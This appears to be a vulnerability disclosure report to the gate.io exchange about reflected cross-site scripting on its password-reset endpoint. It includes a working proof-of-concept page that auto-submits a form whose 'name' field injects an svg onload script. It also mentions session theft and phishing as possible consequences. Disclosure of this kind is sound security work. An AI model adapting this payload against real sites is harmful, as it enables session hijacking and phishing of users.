gate.io
Hi,
I would like to report a Cross-Site Scripting (XSS) vulnerability that affects gate.io main domain.
Kindly find below the full vulnerability details :
Reflected Cross-Site Scripting (XSS)
The vulnerability allow a remote attacker to inject html tags and execute Javascript in the same context of gate.io domain which could lead to steal user's session, peform CSRF attacks or open a phishing page on gate.io.
gate.io
https:// /resetpw
POST
https:// /POC/Gate.io_XSS.html
I've attached screenshot for the XSS POC and XSS POC Page.
Kindly check and review the vulnerability.
Thanks in advance!
<html>
<body>
<form action="https:// /resetpw" method="POST">
<input type="hidden" name="name" value="test"><svg/onload="confirm(document.domain)">" />
<input type="hidden" name="email" value="tester@gmail.com " />
<input type="hidden" name="fingerprint" value="4cc3ed1ac29fbe65dc2a131570880861" />
<input type="hidden" name="geetest_challenge" value="67dbf8e6456e7d664f663b70134b99z1jx" />
<input type="hidden" name="geetest_validate" value="a8a5dbd62cc80086bfb2544ee887b9bb" />
<input type="hidden" name="geetest_seccode" value="a8a5dbe62cc80086bfb2544ee887bxbb|jordan" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>